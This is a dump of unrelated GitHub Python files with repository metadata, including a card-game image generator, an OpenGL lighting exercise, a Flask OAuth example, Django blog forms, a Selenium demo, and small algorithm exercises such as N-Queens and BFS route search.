self.add_text_no_box(image,f\"{self.data['description']}\",120, 230, 180, 120, maximum_font_size=12)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n def generate_interrupt(self):\n self.mode = \"interrupt\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n #image = self.draw_main_stats(image)\n\n image = self.add_image_cropped(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n image = self.add_text_no_box(image,f\"{self.data['description']}\",120, 230, 180, 120, maximum_font_size=12)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n def generate_event(self):\n self.mode = \"event\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n #image = self.draw_main_stats(image)\n\n image = self.add_image_cropped(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n\n image = self.add_text_no_box(image, f\"{self.data['description']}\", 120, 230, 180, 120, maximum_font_size=12)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n def generate_creature(self):\n self.mode = \"creature\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n image = self.draw_main_stats(image)\n\n image = self.add_image(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n #########################\n\n image.save(self.file_name)\n #os.system(self.file_name) # show file\n\n def add_special_info(self, image):\n if self.mode == \"equipment_and_spell\":\n if self.data['type'] == \"spell\":\n image = self.add_text(image, f\"(Zauber)\", 120, 60, 200, 12)\n elif self.data[\"type\"] == \"equipment\":\n image = self.add_text(image, f\"(Ausrüstung)\", 120, 60, 200, 12)\n elif self.mode == \"buff\":\n image = self.add_text(image, f\"(Eigenschaft)\", 120, 60, 200, 12)\n elif self.mode == \"interrupt\":\n image = self.add_text(image, f\"(Konter)\", 120, 60, 200, 12)\n elif self.mode == \"event\":\n image = self.add_text(image, f\"(Event)\", 120, 60, 200, 12)\n else:\n if self.data[\"equipment_slot\"] == True and self.data[\"spell_slot\"] == True:\n image = self.add_text(image, f\"(Slot: Ausrüstung o. 
Zauber)\", 120, 60, 200, 12)\n elif self.data[\"spell_slot\"] == True:\n image = self.add_text(image, f\"(Slot: Zauber)\", 120, 60, 200, 12)\n elif self.data[\"equipment_slot\"] == True:\n image = self.add_text(image, f\"(Slot: Ausrüstung)\", 120, 60, 200, 12)\n return image\n\n def get_text_layer(self):\n img2 = ImageText((240, 336), mode=\"RGBA\", background=(0, 0, 0, 30), maximum_font_size=16)\n img2.image.convert(\"PA\")\n img2.fill_text_box((120, 20), self.data[\"name\"], box_width=180, box_height=40, font_filename=self.font_name)\n overlay = img2.image\n overlay.convert(\"RGBA\")\n return overlay\n\n def add_text(self, image, text, centerX, centerY, width, height, maximum_font_size=16):\n if text == \"\":\n return image\n img2 = ImageText((240, 336), mode=\"RGBA\", background=(0, 0, 0, 0), maximum_font_size=maximum_font_size)\n img2.image.convert(\"PA\")\n img2.fill_text_box((centerX, centerY), text, box_width=width, box_height=height, font_filename=self.font_name)\n overlay = img2.image\n overlay.convert(\"RGBA\")\n image = Image.alpha_composite(image, overlay)\n return image\n\n def add_text_no_box(self, image, text, centerX, centerY, width, height, maximum_font_size=16):\n if text == \"\":\n return image\n img2 = ImageText((240, 336), mode=\"RGBA\", background=(0, 0, 0, 0), maximum_font_size=maximum_font_size)\n img2.image.convert(\"PA\")\n img2.write_text_box((centerX, centerY), text, box_width=width, font_size=maximum_font_size, font_filename=self.font_name)\n overlay = img2.image\n overlay.convert(\"RGBA\")\n image = Image.alpha_composite(image, overlay)\n return image\n\n def add_image(self, image):\n if \"image\" in self.data and self.data[\"image\"] != \"\":\n im2 = Image.open(f'../../assets/{self.data[\"image\"]}.png')\n else:\n im2 = Image.open('../../assets/empty.png')\n\n #im2.thumbnail((232, 232), Image.Resampling.LANCZOS)\n #im2 = im2.crop((0, 49, im2.width - 1, im2.height - 49))\n\n im2.thumbnail((232, 232), Image.Resampling.LANCZOS)\n #im2 = im2.crop((0, 49, im2.width - 1, im2.height - 49))\n\n image = image.copy()\n image.paste(im2, (5, 336-232-28))\n return image\n\n def add_image_cropped(self, image):\n if \"image\" in self.data and self.data[\"image\"] != \"\":\n im2 = Image.open(f'../../assets/{self.data[\"image\"]}.png')\n else:\n im2 = Image.open('../../assets/empty.png')\n\n im2.thumbnail((232, 232), Image.Resampling.LANCZOS)\n im2 = im2.crop((0, 49, im2.width - 1, im2.height - 49))\n\n image = image.copy()\n image.paste(im2, (5, 336-232-28))\n return image\n\n def draw_lines(self, image):\n draw = ImageDraw.Draw(image, mode=\"RGBA\")\n # draw text\n\n draw.line(xy=[(0, 0), (image.width, 0), (image.width, image.height), (0, image.height), (0, 0)],\n fill=self.neutralColorA, width=10)\n #draw.line(xy=[(0, 25), (image.width, 25)], fill=self.neutralColorA, width=1)\n #draw.line(xy=[(0, 50), (image.width, 50)], fill=self.neutralColorA, width=1)\n\n\n if self.mode == \"creature\" or self.mode == \"buff\":\n draw.line(xy=[(0, 310), (image.width, 310)], fill=self.neutralColorA, width=5)\n else:\n draw.line(xy=[(0, 336-28-49-49), (image.width, 336-28-49-49)], fill=self.neutralColorA, width=2)\n\n if \"victory_points\" in self.data and self.data['victory_points'] > 0:\n draw.text((image.width - 30, 20), f\"{self.data['victory_points']} VP\", font=self.font,\n fill=self.neutralColorA)\n if \"cost_silver\" in self.data and self.data['cost_silver'] > 0:\n draw.text((10, 20), f\"{self.data['cost_silver']} S\", font=self.font, fill=self.neutralColorA)\n if 
\"cost_zynalith\" in self.data and self.data['cost_zynalith'] > 0:\n draw.text((10, 35), f\"{self.data['cost_zynalith']} Z\", font=self.font, fill=self.neutralColorA)\n\n draw.line(xy=[(0, 336-232-28-2), (image.width, 336-232-28-2)], fill=self.neutralColorA, width=2)\n #draw.line(xy=[(0, 185), (image.width, 185)], fill=self.neutralColorA, width=1)\n\n\n def draw_main_stats(self, image):\n draw = ImageDraw.Draw(image, mode=\"RGBA\")\n draw.line(xy=[(61, 310), (61, 336)], fill=self.neutralColorA, width=6)\n draw.line(xy=[(120, 310), (120, 336)], fill=self.neutralColorA, width=6)\n draw.line(xy=[(179, 310), (179, 336)], fill=self.neutralColorA, width=6)\n\n helligkeit = 200\n draw.rectangle([(5, 313), (58, 331)], fill=(255,255,helligkeit))\n draw.rectangle([(64, 313), (117, 331)], fill=(255, helligkeit, helligkeit))\n draw.rectangle([(123, 313), (176, 331)], fill=(helligkeit, helligkeit, 255))\n draw.rectangle([(182, 313), (235, 331)], fill=(helligkeit, 255, helligkeit))\n # total_width = 240 - 5*5 = 215, 215/4= 53,75\n\n\n image = self.add_text(image, f\"{self.data['initiative']} INIT\", 31, 323, 50, 16)\n image = self.add_text(image, f\"{self.data['attack']} ATK\", 89, 323, 50, 16)\n image = self.add_text(image, f\"{self.data['defense']} DEF\", 151, 323, 50, 16)\n image = self.add_text(image, f\"{self.data['health_points']} HP\", 209, 323, 50, 16)\n\n\n\n return image\n\n def change_color(self, image):\n image = image.convert(\"RGBA\")\n d = image.getdata()\n new_image = []\n\n creature = (0,0,0)\n spell = (2,-4,2)\n equip = (4,-2,-2) #(2,1,-2)\n interrupt = (4,4,4)\n event = (2,2,-4)\n buff = (-3,-2,4) #(-1,3,1)\n\n for idx, item in enumerate(d):\n r = item[0]\n g = item[1]\n b = item[2]\n a = item[3]\n total = r + g + b\n change = round(total / 40)\n\n tmp = idx % 240\n if self.mode == \"equipment_and_spell\":\n if self.data[\"type\"] == \"equipment\":\n new_image.append((r + equip[0] * change, g + equip[1] * change, b + equip[2] * change, a))\n else:\n new_image.append((r + spell[0] * change, g + spell[1] * change, b + spell[2] * change, a))\n elif self.mode == \"buff\":\n new_image.append((r + buff[0] * change, g + buff[1] * change, b + buff[2] * change, a))\n elif self.mode == \"interrupt\":\n new_image.append((r + interrupt[0] * change, g + interrupt[1] * change, b + interrupt[2] * change, a))\n elif self.mode == \"event\":\n new_image.append((r + event[0] * change, g + event[1] * change, b + event[2] * change, a))\n else:\n if self.data[\"equipment_slot\"] == True and self.data[\"spell_slot\"] == True:\n if tmp < 120:\n new_image.append((r + equip[0] * change, g + equip[1] * change, b + equip[2] * change, a))\n else:\n new_image.append((r + spell[0] * change, g + spell[1] * change, b + spell[2] * change, a))\n elif self.data[\"spell_slot\"] == True:\n new_image.append((r + spell[0] * change, g + spell[1] * change, b + spell[2] * change, a))\n elif self.data[\"equipment_slot\"] == True:\n new_image.append((r + equip[0] * change, g + equip[1] * change, b + equip[2] * change, a))\n else:\n new_image.append((r, g, b, a))\n image.putdata(new_image)\n return image\n\nif False:\n with open(\"../card_data/creatures\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"creature-{idx}\", card_data)\n card.generate_creature()\n\n with open(\"../card_data/buffs\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"buff-{idx}\", card_data)\n 
card.generate_buff()\n\nwith open(\"../card_data/interrupts\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"interrupt-{idx}\", card_data)\n card.generate_interrupt()\n\nwith open(\"../card_data/equipment_and_spells\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"equipment_and_spells-{idx}\", card_data)\n card.generate_equipment_and_spells()\n\nwith open(\"../card_data/events\", \"r\") as f:\n content = f.read()\n content = json.loads(content)\n for idx, card_data in enumerate(content):\n card = Card(f\"event-{idx}\", card_data)\n card.generate_event()","repo_name":"pharnisch/card-game","sub_path":"creature_fights/card_creation_scripts/card_creation.py","file_name":"card_creation.py","file_ext":"py","file_size_in_byte":13350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19296121713","text":"import glfw\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nimport numpy as np\nfrom OpenGL.arrays import vbo\nimport ctypes\n\ngCamAng = 0.\ngCamHeight = 1.\nobject_C = (0,0,0,1)\nlightColor = (1.,1.,1.,1.)\nR_ = 0\nG_ = 0\nB_ = 0\n \n\ndef createVertexAndIndexArrayIndexed():\n varr = np.array([\n (-1,1,1),\n (1,1,1),\n (1,-1,1),\n (-1,-1,1),\n (-1,1,-1),\n (1,1,-1),\n (1,-1,-1),\n (-1,-1,-1),\n ], 'float32')\n\n iarr = np.array([\n (0,2,1),\n (0,3,2),\n (4,5,6),\n (4,6,7),\n (0,1,5),\n (0,5,4),\n (3,6,2),\n (3,7,6),\n (1,2,6),\n (1,6,5),\n (0,7,3),\n (0,4,7),\n ])\n\n narr = np.array([\n (-0.5773502691896258, 0.5773502691896258, 0.5773502691896258),\n (0.8164965809277261, 0.4082482904638631, 0.4082482904638631),\n (0.4082482904638631, -0.4082482904638631, 0.8164965809277261),\n (-0.4082482904638631, -0.8164965809277261, 0.4082482904638631),\n (-0.4082482904638631, 0.4082482904638631, -0.8164965809277261),\n (0.4082482904638631, 0.8164965809277261, -0.4082482904638631),\n (0.5773502691896258, -0.5773502691896258, -0.5773502691896258),\n (-0.8164965809277261, -0.4082482904638631, -0.4082482904638631),\n ], 'float32')\n return varr, iarr, narr\n\n\ndef render():\n global gCamAng, gCamHeight\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glEnable(GL_DEPTH_TEST)\n\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45, 1, 1,10)\n\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluLookAt(5*np.sin(gCamAng),gCamHeight,5*np.cos(gCamAng), 0,0,0, 0,1,0)\n\n drawFrame()\n\n glEnable(GL_LIGHTING) # try to uncomment: no lighting\n glEnable(GL_LIGHT0)\n\n glEnable(GL_NORMALIZE) # try to uncomment: lighting will be incorrect if you scale the object\n glEnable(GL_RESCALE_NORMAL)\n\n # light position\n glPushMatrix()\n t = glfw.get_time()\n\n # glRotatef(t*(180/np.pi),0,1,0) # try to uncomment: rotate light\n lightPos = (3.,4.,5.,1.) # try to change 4th element to 0. 
or 1.\n glLightfv(GL_LIGHT0, GL_POSITION, lightPos)\n glPopMatrix()\n \n # light intensity for each color channel\n lightColor = (1.,1.,1.,1.)\n ambientLightColor = (.1,.1,.1,1.)\n glLightfv(GL_LIGHT0, GL_DIFFUSE, lightColor)\n glLightfv(GL_LIGHT0, GL_SPECULAR, lightColor)\n glLightfv(GL_LIGHT0, GL_AMBIENT, ambientLightColor)\n\n # material reflectance for each color channel\n objectColor = (R_,G_,B_,1)\n specularObjectColor = (1.,1.,1.,1.)\n glMaterialfv(GL_FRONT, GL_AMBIENT_AND_DIFFUSE, objectColor)\n glMaterialfv(GL_FRONT, GL_SHININESS, 10)\n glMaterialfv(GL_FRONT, GL_SPECULAR, specularObjectColor)\n\n glPushMatrix()\n glColor3ub(0, 0, 255) # glColor*() is ignored if lighting is enabled\n\n varr, iarr, narr = createVertexAndIndexArrayIndexed()\n glEnableClientState(GL_VERTEX_ARRAY)\n glEnableClientState(GL_NORMAL_ARRAY)\n glNormalPointer(GL_FLOAT, 3*narr.itemsize, narr)\n glVertexPointer(3, GL_FLOAT, 3*varr.itemsize, varr)\n glDrawElements(GL_TRIANGLES, iarr.size, GL_UNSIGNED_INT, iarr)\n\n glPopMatrix()\n\n glDisable(GL_LIGHTING)\n\ndef drawFrame():\n glBegin(GL_LINES)\n glColor3ub(255, 0, 0)\n glVertex3fv(np.array([0.,0.,0.]))\n glVertex3fv(np.array([1.,0.,0.]))\n glColor3ub(0, 255, 0)\n glVertex3fv(np.array([0.,0.,0.]))\n glVertex3fv(np.array([0.,1.,0.]))\n glColor3ub(0, 0, 255)\n glVertex3fv(np.array([0.,0.,0]))\n glVertex3fv(np.array([0.,0.,1.]))\n glEnd()\n\ndef key_callback(window, key, scancode, action, mods):\n global gCamAng, gCamHeight, object_C, R_, G_, B_\n \n if action==glfw.PRESS or action==glfw.REPEAT:\n if key==glfw.KEY_1:\n gCamAng += np.radians(-10)\n elif key==glfw.KEY_3:\n gCamAng += np.radians(10)\n elif key==glfw.KEY_2:\n gCamHeight += .1\n elif key==glfw.KEY_W:\n gCamHeight += -.1\n\n\n elif key==glfw.KEY_R:\n if(R_ == 0):\n R_ = 1.\n elif(R_ == 1):\n R_ = 0.\n\n elif key==glfw.KEY_G:\n if(G_ == 0):\n G_ = 1.\n elif(G_ == 1):\n G_ = 0.\n \n elif key==glfw.KEY_B:\n if(B_ == 0):\n B_ = 1.\n elif(B_ == 1):\n B_ = 0.\n \n\ndef main():\n global gVertexArraySeparate\n\n if not glfw.init():\n return\n window = glfw.create_window(480,480,'2019060164', None,None)\n if not window:\n glfw.terminate()\n return\n glfw.make_context_current(window)\n glfw.set_key_callback(window, key_callback)\n glfw.swap_interval(1)\n\n while not glfw.window_should_close(window):\n glfw.poll_events()\n render()\n glfw.swap_buffers(window)\n\n glfw.terminate()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"zzzl-523/ComputerGraphics","sub_path":"LabAssignment7/2/assignment7-2.py","file_name":"assignment7-2.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3418630828","text":"\"\"\"\nFlask Documentation: http://flask.pocoo.org/docs/\nJinja2 Documentation: http://jinja.pocoo.org/2/documentation/\nWerkzeug Documentation: http://werkzeug.pocoo.org/documentation/\n\nThis file creates your application.\n\"\"\"\n\nimport os\nfrom flask import Flask, render_template, request, redirect, url_for, session\nimport private\nimport pycn\n\napp = Flask(__name__)\n\nif 'SECRET_KEY' in os.environ:\n app.config['SECRET_KEY'] = os.environ['SECRET_KEY']\nelse:\n app.config['SECRET_KEY'] = 'this_should_be_configured'\n\nAUTH = pycn.OAuth2Handler(\n client_id=private.CLIENT_ID,\n client_secret=private.CLIENT_SECRET,\n redirect_uri=private.REDIRECT_URI\n )\n\n\n###\n# Routing for your application.\n###\n\n@app.route('/')\ndef home():\n \"\"\"Render website's home page.\"\"\"\n \n auth = 
session.get('auth',AUTH)\n\n    try:\n        connect_url = auth.get_authorization_url()\n    except pycn.AuthorizationURLError:\n        app.logger.error('Cannot get the authorization URL.')\n\n    api = None\n    if auth.access_token:\n        api = pycn.API(auth)\n\n    return render_template('home.html', connect_url=connect_url, api=api)\n    \n@app.route('/products/')\ndef products():\n    \"\"\"Render website's products.\"\"\"\n\n    auth = session.get('auth',AUTH)\n    api = pycn.API(auth)\n    \n    return render_template('products.html', products=api.products())\n\n\n@app.route('/browse/')\ndef browse():\n    \"\"\"Render the website's browse page.\"\"\"\n    # Get the \"code\" value\n    code = request.args.get('code', '')\n\n    # Use it to get an access token\n    try:\n        access_token = AUTH.get_access_token(code)\n        session['auth'] = AUTH\n    except pycn.AccessTokenError:\n        app.logger.error('Error! Failed to get access token.')\n    \n    api = pycn.API(AUTH)\n\n    return render_template('browse.html', access_token=access_token, my_profile=api.my_profile())\n\n@app.route('/about/')\ndef about():\n    \"\"\"Render the website's about page.\"\"\"\n    return render_template('about.html')\n\n\n###\n# The functions below should be applicable to all Flask apps.\n###\n\n@app.route('/<file_name>.txt')\ndef send_text_file(file_name):\n    \"\"\"Send your static text file.\"\"\"\n    file_dot_text = file_name + '.txt'\n    return app.send_static_file(file_dot_text)\n\n\n@app.after_request\ndef add_header(response):\n    \"\"\"\n    Add headers to both force latest IE rendering engine or Chrome Frame,\n    and also to cache the rendered page for 10 minutes.\n    \"\"\"\n    response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n    response.headers['Cache-Control'] = 'public, max-age=600'\n    return response\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n    \"\"\"Custom 404 page.\"\"\"\n    return render_template('404.html'), 404\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"consumerio/pycn-example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15122812850","text":"#Image Difference\n\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimageName1 = 'Mount_Fuji.jpg'\nimageName2 = 'ocean.jpg'\n\ndef diff(img1, img2):\n    diffImage = (img1 - img2) + (img2 - img1)\n    #diffImage = cv2.absdiff(img1,img2)\n    return diffImage\n\n#load a color image in grayscale\nimage1 = cv2.imread(imageName1, 0)\nimage2 = cv2.imread(imageName2, 0)\n\n#print the image size\nprint(\"Shape img 1: \" + str(image1.shape))\nprint(\"Shape img 2: \" + str(image2.shape))\n\n\n#resize the images to be the same size\nimage1 = image1[:803,200:1400]\nimage2 = image2[:803,:1200]\n\nimage3 = diff(image1,image2)\nimageName3 = \"Difference_Image.jpg\"\ncv2.imwrite(imageName3,image3)\n\ncv2.imshow(imageName3, np.array(image3, dtype=np.uint8))\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"ataffe/computer_vision","sub_path":"2_Image_Difference/Image_Diff.py","file_name":"Image_Diff.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28169756607","text":"\n#test sdd deep learning\n\nfrom sdd_Communication import sdd_client\n#from sdd_Communication.sdd_download_images import get_defect_image\nfrom sdd_util.sdd_database import db_extraction\nfrom config import class_json\nimport glob\nimport json \nimport os\nimport config 
\n\n\n\n\n#print(class_json)\n#####################################################################\ntest_image_root = '/sdd_images/crop_image/89005/*.jpg'\ntest_image = glob.glob(test_image_root)\n#print(test_image)\nprint('test')\n#####################################################################\n\n#while 1:\n# coil_id = get_defect_image(crop=True)\n\nget_data_query = \"\"\"SELECT TOP 1000 [no]\n ,[defect_no]\n ,[sdd_class]\n ,[deep_class]\n ,[deep_class_name]\n ,[deep_accuracy]\n FROM [2HAP_Deep_Test].[dbo].[prediction]\"\"\"\n\ninsert_query =\"\"\"insert into [2HAP_Deep_Test].[dbo].[prediction] \n values('{0}','{1}','{2}','{3}','{4}','{5}','{6}')\"\"\"\n \nsdd_deep_test_db = db_extraction(config.server_name,config.database_name) #database\n\nwith open(class_json)as json_file: #label name json load\n json_data=json.load(json_file)\n#print(json_data)\nscc = sdd_client.client() #crop image client \nfor i,im in enumerate(test_image): \n coil_id,defect_no,no = os.path.basename(os.path.splitext(im)[0]).split('_')\n print('no: %s,coil_id: %s,defect_no: %s' %(no,coil_id,defect_no))\n predict = scc.get_predict(im).decode('utf-8') \n key_no = predict.split(':')[0] #dict keys\n print(json_data[key_no],predict)\n #database insert\n sdd_deep_test_db.insert_data(insert_query.format(no,coil_id,defect_no,0,0,json_data[key_no],predict.split(':')[1]).replace(\"\\n\",\"\")) #database insert\nsdd_deep_test_db.close() #database close","repo_name":"neuroph12/sdd_deep_learning_test","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14120069617","text":"#!/usr/bin/env python\n\n# Setuptools module description for the Moca Dispatch Server\n\nfrom ez_setup import use_setuptools\nuse_setuptools()\nfrom setuptools import setup, find_packages\n\n#packages = find_packages(exclude='tests')\npackages = ['moca',]\n\nsetup(name='Moca-MDS',\n version='1.0',\n description='The Moca Dispatch Server -- a Django middleware layer for the Moca project.',\n long_description=\"\"\"\nThe Moca Dispatch Server (MDS) is a middleware layer in for the Moca project\nwhich is used to abstract the connection between Moca clients and the backend\nEMR.\n\"\"\",\n author='Moca Mobile',\n author_email='moca-developers@mit.edu',\n url='http://www.mocamobile.org',\n license = \"BSD\",\n include_package_data = True,\n packages=packages,\n scripts=['scripts/requirements.txt',],\n package_dir = {\n 'moca': 'moca',\n },\n package_data={'moca': ['templates/*', 'media/*', 'settings.py.tmpl']},\n install_requires=['Django>=1.1.1',],\n classifiers = [\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n ],\n )\n","repo_name":"addisclinic/mobile-dispatch-server","sub_path":"mds/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"9342839352","text":"# importing modules to be used\nfrom django import forms\nfrom django.db.models import fields\nfrom django.forms import widgets\nfrom blog import models\nfrom blog.models import Post,Comment\n\n# class for forms that are based on the models\nclass PostForm(forms.ModelForm):\n \n # a class within a class to connect to the model\n class Meta:\n model = Post\n fields = ('author','title','text')\n\n # widgets to access specific element of the post and apply css classes\n widgets = {\n 
'title':forms.TextInput(attrs={'class':'textinputclass'}),\n            'text':forms.Textarea(attrs={'class':'editable medium-editor-textarea postcontent'})\n        }\n\n# class for forms that are based on the models\nclass CommentForm(forms.ModelForm):\n\n    # a class within a class to connect to the model\n    class Meta:\n        model = Post\n        fields = ('author','text')\n\n    # widgets to access specific elements of the comment and apply css classes\n    widgets = {\n        'author':forms.TextInput(attrs={'class':'textinputclass'}),\n        'text':forms.Textarea(attrs={'class':'editable medium-editor-textarea'})\n    }\n\n\n    \n","repo_name":"mickiyas123/Python-and-Django-Bootcamp","sub_path":"Blog Project Clone1/mysite/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28252683837","text":"from typing import List\n\n\nclass Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\n\nclass LinkList:\n    def __init__(self):\n        self.head = None\n\n    def insert_head(self, data):\n        new_node = Node(data)\n        if self.head:\n            new_node.next = self.head\n        self.head = new_node\n\n    def append(self, data):\n        if self.head is None:\n            self.insert_head(data)\n        else:\n            cur = self.head\n            while cur.next:\n                cur = cur.next\n            cur.next = Node(data)\n\n    def insert(self, i, data):\n        if self.head is None or i == 1:\n            self.insert_head(data)\n        else:\n            new_node = Node(data)\n            cur = self.head\n            pre = cur\n            j = 1\n            while j < i:\n                pre = cur\n                cur = cur.next\n                j += 1\n            pre.next = new_node\n            new_node.next = cur\n\n    def linklist(self, obj: List):\n        new_node = Node(obj[0])\n        self.head = new_node\n        cur = new_node\n        for i in obj[1:]:\n            cur.next = Node(i)\n            cur = cur.next\n\n    def print_list(self):\n        cur = self.head\n        while cur:\n            print(cur.data)\n            cur = cur.next\n\n    def del_head(self):\n        if self.head is None:\n            print('空链表')\n        else:\n            self.head = self.head.next\n\n    def del_tail(self):\n        if self.head is None:\n            print('空链表')\n        else:\n            cur = self.head\n            pre = cur\n            while cur.next:\n                pre = cur\n                cur = cur.next\n            pre.next = None\n            return cur.data\n\n    def __repr__(self):\n        cur = self.head\n        str_1 = ''\n        while cur:\n            str_1 = str_1 + 'Node(%s)-->' % (cur.data)\n            cur = cur.next\n        return str_1 + 'END'\n\n\na = LinkList()\n\na.linklist([1, 23, 4, 5])\nprint(a)\na.del_tail()\nprint(a)\n","repo_name":"q798010412/untitled2","sub_path":"6.19/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1506062258","text":"class Solution:\n    def solveNQueens(self, n: int) -> List[List[str]]:\n        res = []\n        path = []\n        array = [['.']*n for i in range(n)] # 棋盘\n        \n        def isValid(array,row,col):\n            for i in range(row): # 列重复\n                if array[i][col] == 'Q':return False\n            for i in range(1,row+1):\n                if col-i>=0 and array[row-i][col-i]=='Q':return False # 左上角重复\n                if col+i < n and array[row-i][col+i] == 'Q':return False # 右上角重复\n            return True\n        \n        def dfs(array,row):\n            if row==n:\n                path=[]\n                for i in range(n):\n                    path.append(''.join(array[i]))\n                res.append(path[:])\n                return \n            \n            for i in range(n):\n                if isValid(array,row,i):\n                    array[row][i]='Q'\n                    dfs(array,row+1)\n                    array[row][i]='.'\n        \n        dfs(array,0)\n        return 
res","repo_name":"sadbird1729/LeetcodeRepo","sub_path":"51-n-queens/51-n-queens.py","file_name":"51-n-queens.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17880393625","text":"import time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\n\nbrowser = webdriver.Chrome()\nurl = 'http://www.runoob.com/try/try.php?filename=jqueryui-api-droppable'\nbrowser.get(url)\nbrowser.switch_to.frame('iframeResult')\ntry:\n logo = browser.find_element_by_class_name('logo')\nexcept NoSuchElementException:\n print('NO LOGO')\nbrowser.switch_to.parent_frame()\nlogo = browser.find_element_by_class_name('logo')\nprint(logo)\nprint(logo.text)","repo_name":"JasonSam1996/Python3CrawlerDemo","sub_path":"7_1/SeleniumDemo9.py","file_name":"SeleniumDemo9.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69850372325","text":"## @Author: Felipe Ferreira Dev\n\n\nimport collections\n\n# Algoritmo BFS\n\n# Define função (graph = mapa/grafo, city_begin = cidade inicial, city_end = cidade final)\ndef bfs(graph, city_begin, city_end):\n\n # Visited -> Seta como vazio, deque -> maneira mais facil de trabalhar com listas\n visited, lista = set(), collections.deque([city_begin])\n visited.add(city_begin)\n\n while lista:\n\n # Retira um vertice da fila (vertex = vertice)\n vertex = lista.popleft()\n print(str(vertex) + \" \", end=\"\")\n if city_end == str(vertex):\n exit()\n\n\n # Percorre o grafo pelo vertice e atribui ao neighbour\n for neighbour in graph[vertex]:\n # Se ele ainda não foi visitado, é adicionado a lista de visitado\n # Visited -> Lista de visitados\n if neighbour not in visited:\n visited.add(neighbour)\n # Insere um registro após último elemento\n lista.append(neighbour)\n\n\n# Controle do escopo da execução\nif __name__ == '__main__':\n graph = { \n \"Oradea\": [\"Zerind\", \"Sibiu\"],\n \"Zerind\": [\"Arad\", \"Oradea\"],\n \"Arad\": [\"Zerind\", \"Sibiu\", \"Timisoara\"],\n \"Sibiu\": [\"Oradea\", \"Fagaras\", \"Arad\", \"Rimnicu_Vilcea\"],\n \"Fagaras\": [\"Sibiu\", \"Bucharest\"],\n \"Timisoara\": [\"Arad\", \"Lugoj\"],\n \"Rimnicu_Vilcea\": [\"Sibiu\", \"Craiova\", \"Pitesti\"],\n \"Lugoj\": [\"Timisoara\", \"Mehadia\"],\n \"Pitesti\":[\"Rimnicu_Vilcea\", \"Bucharest\", \"Craiova\"],\n \"Mehadia\":[\"Lugoj\", \"Dobreta\"],\n \"Dobreta\":[\"Mehadia\", \"Craiova\"],\n \"Craiova\":[\"Dobreta\", \"Rimnicu_Vilcea\", \"Pitesti\"],\n \"Bucharest\":[\"Pitesti\", \"Fagaras\", \"Giurgiu\", \"Urziceni\"],\n \"Giurgiu\":[\"Bucharest\"],\n \"Urziceni\":[\"Bucharest\", \"Hirsova\", \"Vaslui\"],\n \"Hirsova\":[\"Urziceni\", \"Eforie\"],\n \"Eforie\":[\"Hirsova\"],\n \"Vaslui\":[\"Urziceni\", \"Lasi\"],\n \"Lasi\":[\"Vaslui\", \"Neamt\"],\n \"Neamt\":[\"Lasi\"]\n}\n\n # Pede para o usuário as cidades\n city_begin = input(\"Digite a cidade inicial: \\n\")\n city_end = input(\"Digite a cidade final: \\n\")\n print(\"\\n****************************************\")\n # Chama a função\n 